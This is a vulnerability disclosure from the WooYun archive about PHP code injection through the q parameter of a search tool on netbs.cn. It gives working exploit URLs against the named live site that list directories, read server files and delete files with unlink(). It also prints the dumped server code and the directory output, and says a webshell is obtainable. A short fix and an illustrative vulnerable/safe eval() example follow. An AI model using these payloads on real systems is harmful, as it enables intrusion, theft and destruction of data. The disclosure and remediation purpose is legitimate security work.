WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reader ------------------ http://drop.zone.ci/
2013-11-12: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly.
2013-12-27: The vendor has actively ignored the vulnerability; details disclosed to the public.
The code does not filter sensitive characters in the q parameter, so attacker-supplied PHP code is evaluated remotely (PHP code execution). The proof of concept below uses the `${...}` string-expression syntax to run arbitrary calls:
http://www.netbs.cn/tool/yb/yb.php?q=${@exit(print_r(scandir($_GET[d])))}&d=../../
Array( [0] => . [1] => .. [2] => 123 [3] => 168 [4] => 20130720195947.rar [5] => 2345 [6] => 360buy-union.txt [7] => 82051.txt [8] => HTML [9] => Plugins [10] => Top-verification.html [11] => _WU8G02t5Wuoiw5yWg4Cfd4wz5g.html [12] => a [13] => about [14] => ad [15] => api [16] => aspnet_client [17] => baidu_verify_729eGdarRG.html [18] => baidunews.xml [19] => bbs [20] => bdsitemap.txt [21] => bdunion.txt [22] => cert [23] => check.txt [24] => css [25] => en [26] => favicon.ico [27] => google59c3fe0e4120c597.html [28] => gs_union_verify_file.html [29] => home [30] => images [31] => include [32] => index [33] => index.html [34] => index.php [35] => info [36] => kLtLsTFNw_UD3XyZOfqZvQrBNHc.html [37] => license.txt [38] => main [39] => mainindex.html [40] => member [41] => netbsdede [42] => netbsmain.html [43] => news [44] => plus [45] => qqmail_domain_verify.txt [46] => robots.php [47] => robots.txt [48] => robots2.txt [49] => shop [50] => shuiyin.jpg [51] => sitemap.html [52] => sitemap.xml [53] => sitemaps.xml [54] => special [55] => tags.php [56] => templets [57] => tool [58] => uc_client [59] => upload.php [60] => uploads [61] => version.inc.php)1
Arbitrary files can be read. The following is tool/global.php as dumped with file() via the view-source URL at the end of this section (the target's own code, reconstructed line by line from the print_r() output; the comments are editorial):
<?php
// Loose hostname check used elsewhere on the site.
function is_domain($domain){
    if(preg_match("/^([0-9a-z\-]{1,}\.)?[0-9a-z\-]{2,}\.([0-9a-z\-]{2,}\.)?[a-z]{2,}$/i", $domain)) {
        return true;
    }else{
        return false;
    }
}

// Fetches a remote URL, trying allow_url_fopen, then cURL, then a raw socket.
function get_content($url){
    if(!strpos($url, '://')) return 'Invalid URI';
    $content = '';
    if(ini_get('allow_url_fopen')){
        $cnt=0;
        // Retry up to 15 times on failure.
        while($cnt < 15 && ($content=@file_get_contents($url))===FALSE) $cnt++;
    }
    elseif(function_exists('curl_init')){
        $handle = curl_init();
        curl_setopt($handle, CURLOPT_URL, $url);
        curl_setopt($handle, CURLOPT_CONNECTTIMEOUT, 5);
        curl_setopt($handle, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($handle, CURLOPT_FOLLOWLOCATION, 0);
        $content = curl_exec($handle);
        curl_close($handle);
    }
    elseif(function_exists('fsockopen')){
        $urlinfo = parse_url($url);
        $host = $urlinfo['host'];
        $str = explode($host, $url);
        $uri = $str[1];
        unset($urlinfo, $str);
        $content = '';
        $fp = fsockopen($host, 80, $errno, $errstr, 30);
        if(!$fp){
            $content = 'Can Not Open Socket...';
        }
        else{
            // Hand-built HTTP/1.1 request; the client's User-Agent is forwarded as-is.
            $out = "GET $uri HTTP/1.1\r\n";
            $out.= "Host: $host \r\n";
            $out.= "Accept: */*\r\n";
            $out.= "User-Agent: $_SERVER[HTTP_USER_AGENT]\r\n";
            $out.= "Connection: Close\r\n\r\n";
            fputs($fp, $out);
            while (!feof($fp)){
                $content .= fgets($fp, 4069);
            }
            fclose($fp);
        }
    }
    if(empty($content)) $content = '无法打开该链接!'; // "Unable to open this link!"
    return $content;
}
?>
Dumped with:
view-source:http://www.netbs.cn/tool/yb/yb.php?q=${@exit(print_r(file($_GET[d])))}&d=../../tool/global.php
Files can be deleted. Parameter n is the filename to delete:
http://www.netbs.cn/yb/yb.php?q=${@exit(var_dump(unlink($_GET[n])))}&n=./../xxxx.txt
A webshell can also be obtained directly.
As shown above.
Filter sensitive characters! More fundamentally, the q parameter must never reach eval() or any string that PHP itself evaluates; the `${...}` syntax is only interpreted inside such a string, and that is what turns the parameter into code here.
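How a `${...}` payload like the one in the proof of concept becomes code execution, and the fix, as an added example. This is not code from netbs.cn or from the report: the page never shows the actual sink inside yb.php, so the pattern below (user input spliced into a double-quoted PHP string literal that is then passed to eval()) is an assumption about how such a sink typically arises; the function names and the "Search results" string are invented for illustration.

```php
<?php
// Added example, not the target's code. The eval()-of-a-double-quoted-string
// sink is assumed; it is one common way a "${...}" injection like the PoC arises.

function render_vulnerable(string $q): string
{
    // VULNERABLE: $q is pasted into PHP source between double quotes.
    // Inside a double-quoted string PHP treats "${expr}" as a variable-variable
    // and evaluates expr, so q=${@exit(print_r(scandir($_GET[d])))} runs
    // scandir(), prints the listing, and then exit()s the script.
    $code = '$out = "Search results for: ' . $q . '";';
    eval($code);           // never do this with request data
    return $out;
}

function render_safe(string $q): string
{
    // SAFE: the string is built by ordinary concatenation and never re-parsed,
    // so "${" and "$" in $q stay literal characters. The value is then escaped
    // for the HTML context it is printed into.
    $out = 'Search results for: ' . $q;
    return htmlspecialchars($out, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Constructed input mirroring the PoC; only the safe path is exercised here.
$payload = '${@exit(print_r(scandir($_GET[d])))}';
echo render_safe($payload) . PHP_EOL;
// Output contains the payload verbatim; nothing is executed.
```

Two side notes a tester will recognise from the output above: print_r() returns true when it prints, and exit(true) echoes "1", which is the stray `1` after the directory listing; and the `$_GET[d]` inside the braces is parsed as a full PHP expression, so `d` is a bare constant there (a notice on the PHP 5 of 2013, a fatal error on PHP 8), which is why such payloads are usually written against old interpreters.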
Unable to reach the vendor, or the vendor actively declined.